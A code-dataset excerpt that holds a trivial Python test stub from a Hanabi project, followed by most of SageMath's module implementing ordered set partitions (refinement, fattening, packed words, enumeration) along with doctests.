jzlou/auto-hanabi
|
ad580a5d9a5d5a487bafcbfd97b88a3dc71632ef
|
[
"MIT"
] | 2
|
2018-12-14T10:39:41.000Z
|
2021-04-28T16:03:47.000Z
|
player/clues.py
|
jzlou/auto-hanabi
|
ad580a5d9a5d5a487bafcbfd97b88a3dc71632ef
|
[
"MIT"
] | null | null | null |
player/clues.py
|
jzlou/auto-hanabi
|
ad580a5d9a5d5a487bafcbfd97b88a3dc71632ef
|
[
"MIT"
] | null | null | null |
def test():
print("it worked!")
| 11.333333
| 21
| 0.588235
|
70408ad52f12f33cb93617a2f77728545b754fef
| 46,692
|
py
|
Python
|
src/sage/combinat/set_partition_ordered.py
|
fchapoton/sage
|
765c5cb3e24dd134708eca97e4c52e0221cd94ba
|
[
"BSL-1.0"
] | 1
|
2020-08-30T04:27:27.000Z
|
2020-08-30T04:27:27.000Z
|
src/sage/combinat/set_partition_ordered.py
|
fchapoton/sage
|
765c5cb3e24dd134708eca97e4c52e0221cd94ba
|
[
"BSL-1.0"
] | null | null | null |
src/sage/combinat/set_partition_ordered.py
|
fchapoton/sage
|
765c5cb3e24dd134708eca97e4c52e0221cd94ba
|
[
"BSL-1.0"
] | 1
|
2020-07-23T10:40:14.000Z
|
2020-07-23T10:40:14.000Z
|
r"""
Ordered Set Partitions
AUTHORS:
- Mike Hansen
- MuPAD-Combinat developers (for algorithms and design inspiration)
- Travis Scrimshaw (2013-02-28): Removed ``CombinatorialClass`` and added
entry point through :class:`OrderedSetPartition`.
"""
#*****************************************************************************
# Copyright (C) 2007 Mike Hansen <mhansen@gmail.com>,
#
# Distributed under the terms of the GNU General Public License (GPL)
#
# This code is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# The full text of the GPL is available at:
#
# https://www.gnu.org/licenses/
#*****************************************************************************
from six import add_metaclass
from sage.arith.all import factorial
from sage.sets.set import Set, Set_generic
from sage.categories.finite_enumerated_sets import FiniteEnumeratedSets
from sage.categories.infinite_enumerated_sets import InfiniteEnumeratedSets
from sage.sets.finite_enumerated_set import FiniteEnumeratedSet
from sage.misc.inherit_comparison import InheritComparisonClasscallMetaclass
from sage.misc.all import prod
from sage.structure.parent import Parent
from sage.structure.element import parent
from sage.structure.unique_representation import UniqueRepresentation
from sage.structure.list_clone import ClonableArray
from sage.structure.richcmp import richcmp
from sage.rings.integer import Integer
from sage.rings.integer_ring import ZZ
from sage.combinat.combinatorial_map import combinatorial_map
from sage.combinat.combinat import stirling_number2
from sage.combinat.composition import Composition, Compositions
from sage.combinat.words.words import Words
from sage.combinat.words.finite_word import FiniteWord_class
import sage.combinat.permutation as permutation
from functools import reduce
from sage.categories.cartesian_product import cartesian_product
@add_metaclass(InheritComparisonClasscallMetaclass)
class OrderedSetPartition(ClonableArray):
r"""
An ordered partition of a set.
An ordered set partition `p` of a set `s` is a list of pairwise
disjoint nonempty subsets of `s` such that the union of these
subsets is `s`. These subsets are called the parts of the partition.
We represent an ordered set partition as a list of sets. By
extension, an ordered set partition of a nonnegative integer `n` is
the set partition of the integers from `1` to `n`. The number of
ordered set partitions of `n` is called the `n`-th ordered Bell
number.
There is a natural integer composition associated with an ordered
set partition, that is the sequence of sizes of all its parts in
order.
The number `T_n` of ordered set partitions of
`\{ 1, 2, \ldots, n \}` is the so-called `n`-th *Fubini number*
(also known as the `n`-th ordered Bell number; see
:wikipedia:`Ordered Bell number`). Its exponential generating
function is
.. MATH::
\sum_n {T_n \over n!} x^n = {1 \over 2-e^x}.
(See sequence A000670 in OEIS.)
INPUT:
- ``parts`` -- an object or iterable that defines an ordered set partition
(e.g., a list of pairwise disjoint sets) or a packed word (e.g., a list
of letters on some alphabet). If there is ambiguity and if the input should
be treated as a packed word, the keyword ``from_word`` should be used.
EXAMPLES:
There are 13 ordered set partitions of `\{1,2,3\}`::
sage: OrderedSetPartitions(3).cardinality()
13
Here is the list of them::
sage: OrderedSetPartitions(3).list()
[[{1}, {2}, {3}],
[{1}, {3}, {2}],
[{2}, {1}, {3}],
[{3}, {1}, {2}],
[{2}, {3}, {1}],
[{3}, {2}, {1}],
[{1}, {2, 3}],
[{2}, {1, 3}],
[{3}, {1, 2}],
[{1, 2}, {3}],
[{1, 3}, {2}],
[{2, 3}, {1}],
[{1, 2, 3}]]
There are 12 ordered set partitions of `\{1,2,3,4\}` whose underlying
composition is `[1,2,1]`::
sage: OrderedSetPartitions(4,[1,2,1]).list()
[[{1}, {2, 3}, {4}],
[{1}, {2, 4}, {3}],
[{1}, {3, 4}, {2}],
[{2}, {1, 3}, {4}],
[{2}, {1, 4}, {3}],
[{3}, {1, 2}, {4}],
[{4}, {1, 2}, {3}],
[{3}, {1, 4}, {2}],
[{4}, {1, 3}, {2}],
[{2}, {3, 4}, {1}],
[{3}, {2, 4}, {1}],
[{4}, {2, 3}, {1}]]
Since :trac:`14140`, we can create an ordered set partition directly by
:class:`OrderedSetPartition` which creates the parent object by taking the
union of the partitions passed in. However it is recommended and
(marginally) faster to create the parent first and then create the ordered
set partition from that. ::
sage: s = OrderedSetPartition([[1,3],[2,4]]); s
[{1, 3}, {2, 4}]
sage: s.parent()
Ordered set partitions of {1, 2, 3, 4}
We can construct the ordered set partition from a word,
which we consider as packed::
sage: OrderedSetPartition([2,4,1,2])
[{3}, {1, 4}, {2}]
sage: OrderedSetPartition(from_word=[2,4,1,2])
[{3}, {1, 4}, {2}]
sage: OrderedSetPartition(from_word='bdab')
[{3}, {1, 4}, {2}]
REFERENCES:
:wikipedia:`Ordered_partition_of_a_set`
"""
@staticmethod
def __classcall_private__(cls, parts=None, from_word=None):
"""
Create a set partition from ``parts`` with the appropriate parent.
EXAMPLES::
sage: s = OrderedSetPartition([[1,3],[2,4]]); s
[{1, 3}, {2, 4}]
sage: s.parent()
Ordered set partitions of {1, 2, 3, 4}
sage: t = OrderedSetPartition([[2,4],[1,3]]); t
[{2, 4}, {1, 3}]
sage: s != t
True
sage: OrderedSetPartition()
[]
sage: OrderedSetPartition([])
[]
sage: OrderedSetPartition('')
[]
sage: OrderedSetPartition('bdab') == OrderedSetPartition(from_word='bdab')
True
sage: OrderedSetPartition('bdab') == OrderedSetPartition(Word('bdab'))
True
"""
if parts is None and from_word is None:
P = OrderedSetPartitions([])
return P.element_class(P, [])
if from_word:
return OrderedSetPartitions().from_finite_word(Words()(from_word))
# if `parts` looks like a sequence of "letters" then treat it like a word.
if parts in Words() or (len(parts) > 0 and (parts[0] in ZZ or isinstance(parts[0], str))):
return OrderedSetPartitions().from_finite_word(Words()(parts))
else:
P = OrderedSetPartitions( reduce(lambda x,y: x.union(y), map(Set, parts), Set([])) )
return P.element_class(P, parts)
def __init__(self, parent, s):
"""
Initialize ``self``.
EXAMPLES::
sage: OS = OrderedSetPartitions(4)
sage: s = OS([[1, 3], [2, 4]])
sage: TestSuite(s).run()
"""
self._base_set = reduce(lambda x,y: x.union(y), map(Set, s), Set([]))
ClonableArray.__init__(self, parent, [Set(_) for _ in s])
def _repr_(self):
"""
Return a string representation of ``self``.
.. TODO::
Sort the repr output of Sage's :class:`Set` and remove
this method.
EXAMPLES::
sage: OrderedSetPartition([[1,3],[2,4]])
[{1, 3}, {2, 4}]
"""
return '[' + ', '.join(('{' + repr(sorted(x))[1:-1] + '}' for x in self)) + ']'
def check(self):
"""
Check that we are a valid ordered set partition.
EXAMPLES::
sage: OS = OrderedSetPartitions(4)
sage: s = OS([[1, 3], [2, 4]])
sage: s.check()
"""
assert self in self.parent(), "%s not in %s" % (self, self.parent())
def _hash_(self):
"""
Return the hash of ``self``.
EXAMPLES::
sage: OS = OrderedSetPartitions(4)
sage: s = OS([[1, 3], [2, 4]])
sage: OSP = OrderedSetPartitions()
sage: hash(s) == hash(OSP(s))
True
"""
return hash(tuple(self))
def base_set(self):
"""
Return the base set of ``self``, which is the union of all parts
of ``self``.
EXAMPLES::
sage: OrderedSetPartition([[1], [2,3], [4]]).base_set()
{1, 2, 3, 4}
sage: OrderedSetPartition([[1,2,3,4]]).base_set()
{1, 2, 3, 4}
sage: OrderedSetPartition([]).base_set()
{}
"""
return Set([e for p in self for e in p])
def base_set_cardinality(self):
"""
Return the cardinality of the base set of ``self``, which is the sum
of the sizes of the parts of ``self``.
This is also known as the *size* (sometimes the *weight*) of
an ordered set partition.
EXAMPLES::
sage: OrderedSetPartition([[1], [2,3], [4]]).base_set_cardinality()
4
sage: OrderedSetPartition([[1,2,3,4]]).base_set_cardinality()
4
"""
return sum(len(x) for x in self)
size = base_set_cardinality
def length(self):
r"""
Return the number of parts of ``self``.
EXAMPLES::
sage: OS = OrderedSetPartitions(4)
sage: s = OS([[1, 3], [2, 4]])
sage: s.length()
2
"""
return len(self)
@combinatorial_map(name='to composition')
def to_composition(self):
r"""
Return the integer composition whose parts are the sizes of the sets
in ``self``.
EXAMPLES::
sage: S = OrderedSetPartitions(5)
sage: x = S([[3,5,4], [1, 2]])
sage: x.to_composition()
[3, 2]
sage: y = S([[3,1], [2], [5,4]])
sage: y.to_composition()
[2, 1, 2]
"""
return Composition([len(p) for p in self])
@staticmethod
def sum(osps):
"""
Return the concatenation of the given ordered set partitions
``osps`` (provided they have no elements in common).
INPUT:
- ``osps`` -- a list (or iterable) of ordered set partitions
EXAMPLES::
sage: OrderedSetPartition.sum([OrderedSetPartition([[4, 1], [3]]), OrderedSetPartition([[7], [2]]), OrderedSetPartition([[5, 6]])])
[{1, 4}, {3}, {7}, {2}, {5, 6}]
Any iterable can be provided as input::
sage: Composition.sum([OrderedSetPartition([[2*i,2*i+1]]) for i in [4,1,3]])
[{8, 9}, {2, 3}, {6, 7}]
Empty inputs are handled gracefully::
sage: OrderedSetPartition.sum([]) == OrderedSetPartition([])
True
TESTS::
sage: A = OrderedSetPartitions(3)([[2], [1, 3]])
sage: B = OrderedSetPartitions([5])([[5]])
sage: C = OrderedSetPartition.sum([A, B]); C
[{2}, {1, 3}, {5}]
sage: C.parent()
Ordered set partitions
"""
return OrderedSetPartitions()(sum((list(i) for i in osps), []))
def reversed(self):
r"""
Return the reversal of the ordered set partition ``self``.
The *reversal* of an ordered set partition
`(P_1, P_2, \ldots, P_k)` is defined to be the ordered
set partition `(P_k, P_{k-1}, \ldots, P_1)`.
EXAMPLES::
sage: OrderedSetPartition([[1, 3], [2]]).reversed()
[{2}, {1, 3}]
sage: OrderedSetPartition([[1, 5], [2, 4]]).reversed()
[{2, 4}, {1, 5}]
sage: OrderedSetPartition([[-1], [-2], [3, 4], [0]]).reversed()
[{0}, {3, 4}, {-2}, {-1}]
sage: OrderedSetPartition([]).reversed()
[]
"""
par = parent(self)
return par(list(reversed(list(self))))
def complement(self):
r"""
Return the complement of the ordered set partition ``self``.
This assumes that ``self`` is an ordered set partition of
an interval of `\ZZ`.
Let `(P_1, P_2, \ldots, P_k)` be an ordered set partition
of some interval `I` of `\ZZ`. Let `\omega` be the unique
strictly decreasing bijection `I \to I`. Then, the
*complement* of `(P_1, P_2, \ldots, P_k)` is defined to be
the ordered set partition
`(\omega(P_1), \omega(P_2), \ldots, \omega(P_k))`.
EXAMPLES::
sage: OrderedSetPartition([[1, 2], [3]]).complement()
[{2, 3}, {1}]
sage: OrderedSetPartition([[1, 3], [2]]).complement()
[{1, 3}, {2}]
sage: OrderedSetPartition([[2, 3]]).complement()
[{2, 3}]
sage: OrderedSetPartition([[1, 5], [2, 3], [4]]).complement()
[{1, 5}, {3, 4}, {2}]
sage: OrderedSetPartition([[-1], [-2], [1, 2], [0]]).complement()
[{1}, {2}, {-2, -1}, {0}]
sage: OrderedSetPartition([]).complement()
[]
"""
if len(self) <= 1:
return self
base_set = self.base_set()
m = min(base_set)
M = max(base_set)
mM = m + M
return OrderedSetPartitions()([[mM - i for i in part] for part in self])
def finer(self):
"""
Return the set of ordered set partitions which are finer
than ``self``.
See :meth:`is_finer` for the definition of "finer".
EXAMPLES::
sage: C = OrderedSetPartition([[1, 3], [2]]).finer()
sage: C.cardinality()
3
sage: C.list()
[[{1}, {3}, {2}], [{3}, {1}, {2}], [{1, 3}, {2}]]
sage: OrderedSetPartition([]).finer()
{[]}
sage: W = OrderedSetPartition([[4, 9], [-1, 2]])
sage: W.finer().list()
[[{9}, {4}, {2}, {-1}],
[{9}, {4}, {-1}, {2}],
[{9}, {4}, {-1, 2}],
[{4}, {9}, {2}, {-1}],
[{4}, {9}, {-1}, {2}],
[{4}, {9}, {-1, 2}],
[{4, 9}, {2}, {-1}],
[{4, 9}, {-1}, {2}],
[{4, 9}, {-1, 2}]]
"""
par = parent(self)
if not self:
return FiniteEnumeratedSet([self])
else:
return FiniteEnumeratedSet([par(sum((list(i) for i in C), []))
for C in cartesian_product([OrderedSetPartitions(X) for X in self])])
def is_finer(self, co2):
"""
Return ``True`` if the ordered set partition ``self`` is finer
than the ordered set partition ``co2``; otherwise, return ``False``.
If `A` and `B` are two ordered set partitions of the same set,
then `A` is said to be *finer* than `B` if `B` can be obtained
from `A` by (repeatedly) merging consecutive parts.
In this case, we say that `B` is *fatter* than `A`.
EXAMPLES::
sage: A = OrderedSetPartition([[1, 3], [2]])
sage: B = OrderedSetPartition([[1], [3], [2]])
sage: A.is_finer(B)
False
sage: B.is_finer(A)
True
sage: C = OrderedSetPartition([[3], [1], [2]])
sage: A.is_finer(C)
False
sage: C.is_finer(A)
True
sage: OrderedSetPartition([[2], [5], [1], [4]]).is_finer(OrderedSetPartition([[2, 5], [1, 4]]))
True
sage: OrderedSetPartition([[5], [2], [1], [4]]).is_finer(OrderedSetPartition([[2, 5], [1, 4]]))
True
sage: OrderedSetPartition([[2], [1], [5], [4]]).is_finer(OrderedSetPartition([[2, 5], [1, 4]]))
False
sage: OrderedSetPartition([[2, 5, 1], [4]]).is_finer(OrderedSetPartition([[2, 5], [1, 4]]))
False
"""
co1 = self
if co1.base_set() != co2.base_set():
raise ValueError("ordered set partitions self (= %s) and co2 (= %s) must be of the same set"%(self, co2))
i1 = 0
for j2 in co2:
sum1 = Set([])
while len(sum1) < len(j2):
sum1 += co1[i1]
i1 += 1
if not sum1.issubset(j2):
return False
return True
def fatten(self, grouping):
r"""
Return the ordered set partition fatter than ``self``, obtained
by grouping together consecutive parts according to the integer
composition ``grouping``.
See :meth:`finer` for the definition of "fatter".
INPUT:
- ``grouping`` -- a composition whose sum is the length of ``self``
EXAMPLES:
Let us start with the ordered set partition::
sage: c = OrderedSetPartition([[2, 5], [1], [3, 4]])
With ``grouping`` equal to `(1, \ldots, 1)`, `c` is left unchanged::
sage: c.fatten(Composition([1,1,1]))
[{2, 5}, {1}, {3, 4}]
With ``grouping`` equal to `(\ell)` where `\ell` is the length of
`c`, this yields the coarsest ordered set partition above `c`::
sage: c.fatten(Composition([3]))
[{1, 2, 3, 4, 5}]
Other values for ``grouping`` yield (all the) other ordered
set partitions coarser than `c`::
sage: c.fatten(Composition([2,1]))
[{1, 2, 5}, {3, 4}]
sage: c.fatten(Composition([1,2]))
[{2, 5}, {1, 3, 4}]
TESTS::
sage: OrderedSetPartition([]).fatten(Composition([]))
[]
sage: c.fatten(Composition([2,1])).__class__ == c.__class__
True
"""
result = [None] * len(grouping)
j = 0
for i in range(len(grouping)):
result[i] = sum(self[j:j+grouping[i]], Set([]))
j += grouping[i]
return parent(self)(result)
def fatter(self):
"""
Return the set of ordered set partitions which are fatter
than ``self``.
See :meth:`finer` for the definition of "fatter".
EXAMPLES::
sage: C = OrderedSetPartition([[2, 5], [1], [3, 4]]).fatter()
sage: C.cardinality()
4
sage: sorted(C)
[[{1, 2, 3, 4, 5}],
[{1, 2, 5}, {3, 4}],
[{2, 5}, {1, 3, 4}],
[{2, 5}, {1}, {3, 4}]]
sage: OrderedSetPartition([[4, 9], [-1, 2]]).fatter().list()
[[{4, 9}, {-1, 2}], [{-1, 2, 4, 9}]]
Some extreme cases::
sage: list(OrderedSetPartition([[5]]).fatter())
[[{5}]]
sage: list(Composition([]).fatter())
[[]]
sage: sorted(OrderedSetPartition([[1], [2], [3], [4]]).fatter())
[[{1, 2, 3, 4}],
[{1, 2, 3}, {4}],
[{1, 2}, {3, 4}],
[{1, 2}, {3}, {4}],
[{1}, {2, 3, 4}],
[{1}, {2, 3}, {4}],
[{1}, {2}, {3, 4}],
[{1}, {2}, {3}, {4}]]
"""
return Compositions(len(self)).map(self.fatten)
@staticmethod
def bottom_up_osp(X, comp):
r"""
Return the ordered set partition obtained by listing the
elements of the set ``X`` in increasing order, and
placing bars between some of them according to the
integer composition ``comp`` (namely, the bars are placed
in such a way that the lengths of the resulting blocks are
exactly the entries of ``comp``).
INPUT:
- ``X`` -- a finite set (or list or tuple)
- ``comp`` -- a composition whose sum is the size of ``X``
(can be given as a list or tuple or composition)
EXAMPLES::
sage: buo = OrderedSetPartition.bottom_up_osp
sage: buo(Set([1, 4, 7, 9]), [2, 1, 1])
[{1, 4}, {7}, {9}]
sage: buo(Set([1, 4, 7, 9]), [1, 3])
[{1}, {4, 7, 9}]
sage: buo(Set([1, 4, 7, 9]), [1, 1, 1, 1])
[{1}, {4}, {7}, {9}]
sage: buo(range(8), [1, 4, 2, 1])
[{0}, {1, 2, 3, 4}, {5, 6}, {7}]
sage: buo([], [])
[]
TESTS::
sage: buo = OrderedSetPartition.bottom_up_osp
sage: parent(buo(Set([1, 4, 7, 9]), [2, 1, 1]))
Ordered set partitions
sage: buo((3, 5, 6), (2, 1))
[{3, 5}, {6}]
sage: buo([3, 5, 6], Composition([1, 2]))
[{3}, {5, 6}]
"""
xs = sorted(X)
result = [None] * len(comp)
j = 0
for i in range(len(comp)):
result[i] = Set(xs[j:j+comp[i]])
j += comp[i]
return OrderedSetPartitions()(result)
def strongly_finer(self):
"""
Return the set of ordered set partitions which are strongly
finer than ``self``.
See :meth:`is_strongly_finer` for the definition of "strongly
finer".
EXAMPLES::
sage: C = OrderedSetPartition([[1, 3], [2]]).strongly_finer()
sage: C.cardinality()
2
sage: C.list()
[[{1}, {3}, {2}], [{1, 3}, {2}]]
sage: OrderedSetPartition([]).strongly_finer()
{[]}
sage: W = OrderedSetPartition([[4, 9], [-1, 2]])
sage: W.strongly_finer().list()
[[{4}, {9}, {-1}, {2}],
[{4}, {9}, {-1, 2}],
[{4, 9}, {-1}, {2}],
[{4, 9}, {-1, 2}]]
"""
par = parent(self)
if not self:
return FiniteEnumeratedSet([self])
else:
buo = OrderedSetPartition.bottom_up_osp
return FiniteEnumeratedSet([par(sum((list(P) for P in C), []))
for C in cartesian_product([[buo(X, comp) for comp in Compositions(len(X))] for X in self])])
def is_strongly_finer(self, co2):
r"""
Return ``True`` if the ordered set partition ``self`` is strongly
finer than the ordered set partition ``co2``; otherwise, return
``False``.
If `A` and `B` are two ordered set partitions of the same set,
then `A` is said to be *strongly finer* than `B` if `B` can be
obtained from `A` by (repeatedly) merging consecutive parts,
provided that every time we merge two consecutive parts `C_i`
and `C_{i+1}`, we have `\max C_i < \min C_{i+1}`.
In this case, we say that `B` is *strongly fatter* than `A`.
EXAMPLES::
sage: A = OrderedSetPartition([[1, 3], [2]])
sage: B = OrderedSetPartition([[1], [3], [2]])
sage: A.is_strongly_finer(B)
False
sage: B.is_strongly_finer(A)
True
sage: C = OrderedSetPartition([[3], [1], [2]])
sage: A.is_strongly_finer(C)
False
sage: C.is_strongly_finer(A)
False
sage: OrderedSetPartition([[2], [5], [1], [4]]).is_strongly_finer(OrderedSetPartition([[2, 5], [1, 4]]))
True
sage: OrderedSetPartition([[5], [2], [1], [4]]).is_strongly_finer(OrderedSetPartition([[2, 5], [1, 4]]))
False
sage: OrderedSetPartition([[2], [1], [5], [4]]).is_strongly_finer(OrderedSetPartition([[2, 5], [1, 4]]))
False
sage: OrderedSetPartition([[2, 5, 1], [4]]).is_strongly_finer(OrderedSetPartition([[2, 5], [1, 4]]))
False
"""
co1 = self
if co1.base_set() != co2.base_set():
raise ValueError("ordered set partitions self (= %s) and co2 (= %s) must be of the same set" % (self, co2))
i1 = 0
for j2 in co2:
sum1 = Set([])
while len(sum1) < len(j2):
next = co1[i1]
if sum1 and max(sum1) >= min(next):
return False
sum1 += next
i1 += 1
if not sum1.issubset(j2):
return False
return True
def strongly_fatter(self):
"""
Return the set of ordered set partitions which are strongly fatter
than ``self``.
See :meth:`strongly_finer` for the definition of "strongly fatter".
EXAMPLES::
sage: C = OrderedSetPartition([[2, 5], [1], [3, 4]]).strongly_fatter()
sage: C.cardinality()
2
sage: sorted(C)
[[{2, 5}, {1, 3, 4}],
[{2, 5}, {1}, {3, 4}]]
sage: OrderedSetPartition([[4, 9], [-1, 2]]).strongly_fatter().list()
[[{4, 9}, {-1, 2}]]
Some extreme cases::
sage: list(OrderedSetPartition([[5]]).strongly_fatter())
[[{5}]]
sage: list(OrderedSetPartition([]).strongly_fatter())
[[]]
sage: sorted(OrderedSetPartition([[1], [2], [3], [4]]).strongly_fatter())
[[{1, 2, 3, 4}],
[{1, 2, 3}, {4}],
[{1, 2}, {3, 4}],
[{1, 2}, {3}, {4}],
[{1}, {2, 3, 4}],
[{1}, {2, 3}, {4}],
[{1}, {2}, {3, 4}],
[{1}, {2}, {3}, {4}]]
sage: sorted(OrderedSetPartition([[1], [3], [2], [4]]).strongly_fatter())
[[{1, 3}, {2, 4}],
[{1, 3}, {2}, {4}],
[{1}, {3}, {2, 4}],
[{1}, {3}, {2}, {4}]]
sage: sorted(OrderedSetPartition([[4], [1], [5], [3]]).strongly_fatter())
[[{4}, {1, 5}, {3}], [{4}, {1}, {5}, {3}]]
"""
c = [sorted(X) for X in self]
l = len(c)
g = [-1] + [i for i in range(l-1) if c[i][-1] > c[i+1][0]] + [l-1]
# g lists the positions of the blocks that cannot be merged
# with their right neighbors.
subcomps = [OrderedSetPartition(c[g[i] + 1 : g[i+1] + 1]) for i in range(len(g)-1)]
# Now, self is the concatenation of the entries of subcomps.
# We can fatten each of the ordered set partitions setcomps
# arbitrarily, and then concatenate the results.
fattenings = [list(subcomp.fatter()) for subcomp in subcomps]
return FiniteEnumeratedSet([OrderedSetPartition(sum([list(gg) for gg in fattening], []))
for fattening in cartesian_product(fattenings)])
@combinatorial_map(name='to packed word')
def to_packed_word(self):
r"""
Return the packed word on alphabet `\{1,2,3,\ldots\}`
corresponding to ``self``.
A *packed word* on alphabet `\{1,2,3,\ldots\}` is any word whose
maximum letter is the same as its total number of distinct letters.
Let `P` be an ordered set partition of a set `X`.
The corresponding packed word `w_1 w_2 \cdots w_n` is constructed
by having letter `w_i = j` if the `i`-th smallest entry in `X`
occurs in the `j`-th block of `P`.
.. SEEALSO::
:meth:`Word.to_ordered_set_partition`
.. WARNING::
This assumes there is a total order on the underlying
set (``self._base_set``).
EXAMPLES::
sage: S = OrderedSetPartitions()
sage: x = S([[3,5], [2], [1,4,6]])
sage: x.to_packed_word()
word: 321313
sage: x = S([['a', 'c', 'e'], ['b', 'd']])
sage: x.to_packed_word()
word: 12121
"""
X = sorted(self._base_set)
out = {}
for i in range(len(self)):
for letter in self[i]:
out[letter] = i
return Words()([out[letter] + 1 for letter in X])
class OrderedSetPartitions(UniqueRepresentation, Parent):
"""
Return the combinatorial class of ordered set partitions of ``s``.
The optional argument ``c``, if specified, restricts the parts of
the partition to have certain sizes (the entries of ``c``).
EXAMPLES::
sage: OS = OrderedSetPartitions([1,2,3,4]); OS
Ordered set partitions of {1, 2, 3, 4}
sage: OS.cardinality()
75
sage: OS.first()
[{1}, {2}, {3}, {4}]
sage: OS.last()
[{1, 2, 3, 4}]
sage: OS.random_element()
[{3}, {1}, {2}, {4}]
::
sage: OS = OrderedSetPartitions([1,2,3,4], [2,2]); OS
Ordered set partitions of {1, 2, 3, 4} into parts of size [2, 2]
sage: OS.cardinality()
6
sage: OS.first()
[{1, 2}, {3, 4}]
sage: OS.last()
[{3, 4}, {1, 2}]
sage: OS.list()
[[{1, 2}, {3, 4}],
[{1, 3}, {2, 4}],
[{1, 4}, {2, 3}],
[{2, 3}, {1, 4}],
[{2, 4}, {1, 3}],
[{3, 4}, {1, 2}]]
::
sage: OS = OrderedSetPartitions("cat")
sage: OS # py2
Ordered set partitions of {'a', 'c', 't'}
sage: OS # py3 random
Ordered set partitions of {'a', 't', 'c'}
sage: sorted(OS.list(), key=str)
[[{'a', 'c', 't'}],
[{'a', 'c'}, {'t'}],
[{'a', 't'}, {'c'}],
[{'a'}, {'c', 't'}],
[{'a'}, {'c'}, {'t'}],
[{'a'}, {'t'}, {'c'}],
[{'c', 't'}, {'a'}],
[{'c'}, {'a', 't'}],
[{'c'}, {'a'}, {'t'}],
[{'c'}, {'t'}, {'a'}],
[{'t'}, {'a', 'c'}],
[{'t'}, {'a'}, {'c'}],
[{'t'}, {'c'}, {'a'}]]
"""
@staticmethod
def __classcall_private__(cls, s=None, c=None):
"""
Choose the correct parent based upon input.
EXAMPLES::
sage: OrderedSetPartitions(4)
Ordered set partitions of {1, 2, 3, 4}
sage: OrderedSetPartitions(4, [1, 2, 1])
Ordered set partitions of {1, 2, 3, 4} into parts of size [1, 2, 1]
"""
if s is None:
if c is not None:
raise NotImplementedError("cannot specify 'c' without specifying 's'")
return OrderedSetPartitions_all()
if isinstance(s, (int, Integer)):
if s < 0:
raise ValueError("s must be non-negative")
s = frozenset(range(1, s+1))
else:
s = frozenset(s)
if c is None:
return OrderedSetPartitions_s(s)
if isinstance(c, (int, Integer)):
return OrderedSetPartitions_sn(s, c)
if c not in Compositions(len(s)):
raise ValueError("c must be a composition of %s"%len(s))
return OrderedSetPartitions_scomp(s, Composition(c))
def __init__(self, s):
"""
Initialize ``self``.
EXAMPLES::
sage: OS = OrderedSetPartitions(4)
sage: TestSuite(OS).run()
"""
self._set = s
Parent.__init__(self, category=FiniteEnumeratedSets())
def _element_constructor_(self, s):
"""
Construct an element of ``self`` from ``s``.
EXAMPLES::
sage: OS = OrderedSetPartitions(4)
sage: OS([[1,3],[2,4]])
[{1, 3}, {2, 4}]
"""
if isinstance(s, OrderedSetPartition):
raise ValueError("cannot convert %s into an element of %s"%(s, self))
return self.element_class(self, list(s))
Element = OrderedSetPartition
def __contains__(self, x):
"""
TESTS::
sage: OS = OrderedSetPartitions([1,2,3,4])
sage: all(sp in OS for sp in OS)
True
sage: [[1,2], [], [3,4]] in OS
False
sage: [Set([1,2]), Set([3,4])] in OS
True
sage: [set([1,2]), set([3,4])] in OS
Traceback (most recent call last):
...
TypeError: X (=...1, 2...) must be a Set
"""
#x must be a list
if not isinstance(x, (OrderedSetPartition, list, tuple)):
return False
#The total number of elements in the list
#should be the same as the number is self._set
if sum(map(len, x)) != len(self._set):
return False
#Check to make sure each element of the list
#is a nonempty set
u = Set([])
for s in x:
if not s or not isinstance(s, (set, frozenset, Set_generic)):
return False
u = u.union(s)
#Make sure that the union of all the
#sets is the original set
if u != Set(self._set):
return False
return True
def from_finite_word(self, w):
r"""
Return the unique ordered set partition of `\{1, 2, \ldots, n\}` corresponding
to a word `w` of length `n`.
.. SEEALSO::
:meth:`Word.to_ordered_set_partition`
EXAMPLES::
sage: A = OrderedSetPartitions().from_finite_word('abcabcabd'); A
[{1, 4, 7}, {2, 5, 8}, {3, 6}, {9}]
sage: B = OrderedSetPartitions().from_finite_word([1,2,3,1,2,3,1,2,4])
sage: A == B
True
"""
# TODO: fix this if statement.
# In fact, what we need is for the underlying alphabet to be sortable.
if isinstance(w, (list, tuple, str, FiniteWord_class)):
return self.element_class(self, Words()(w).to_ordered_set_partition())
else:
raise ValueError("Something is wrong: `from_finite_word` expects an object of type list/tuple/str/Word representing a finite word, received {}.".format(str(w)))
class OrderedSetPartitions_s(OrderedSetPartitions):
"""
Class of ordered partitions of a set `S`.
"""
def _repr_(self):
"""
TESTS::
sage: OrderedSetPartitions([1,2,3,4])
Ordered set partitions of {1, 2, 3, 4}
"""
return "Ordered set partitions of %s" % Set(self._set)
def cardinality(self):
"""
EXAMPLES::
sage: OrderedSetPartitions(0).cardinality()
1
sage: OrderedSetPartitions(1).cardinality()
1
sage: OrderedSetPartitions(2).cardinality()
3
sage: OrderedSetPartitions(3).cardinality()
13
sage: OrderedSetPartitions([1,2,3]).cardinality()
13
sage: OrderedSetPartitions(4).cardinality()
75
sage: OrderedSetPartitions(5).cardinality()
541
"""
return sum([factorial(k)*stirling_number2(len(self._set), k)
for k in range(len(self._set)+1)])
def __iter__(self):
"""
EXAMPLES::
sage: [ p for p in OrderedSetPartitions([1,2,3]) ]
[[{1}, {2}, {3}],
[{1}, {3}, {2}],
[{2}, {1}, {3}],
[{3}, {1}, {2}],
[{2}, {3}, {1}],
[{3}, {2}, {1}],
[{1}, {2, 3}],
[{2}, {1, 3}],
[{3}, {1, 2}],
[{1, 2}, {3}],
[{1, 3}, {2}],
[{2, 3}, {1}],
[{1, 2, 3}]]
"""
for x in Compositions(len(self._set)):
for z in OrderedSetPartitions(self._set, x):
yield self.element_class(self, z)
class OrderedSetPartitions_sn(OrderedSetPartitions):
def __init__(self, s, n):
"""
TESTS::
sage: OS = OrderedSetPartitions([1,2,3,4], 2)
sage: OS == loads(dumps(OS))
True
"""
OrderedSetPartitions.__init__(self, s)
self.n = n
def __contains__(self, x):
"""
TESTS::
sage: OS = OrderedSetPartitions([1,2,3,4], 2)
sage: all(sp in OS for sp in OS)
True
sage: OS.cardinality()
14
sage: len([x for x in OrderedSetPartitions([1,2,3,4]) if x in OS])
14
"""
return OrderedSetPartitions.__contains__(self, x) and len(x) == self.n
def __repr__(self):
"""
TESTS::
sage: OrderedSetPartitions([1,2,3,4], 2)
Ordered set partitions of {1, 2, 3, 4} into 2 parts
"""
return "Ordered set partitions of %s into %s parts" % (Set(self._set),
self.n)
def cardinality(self):
"""
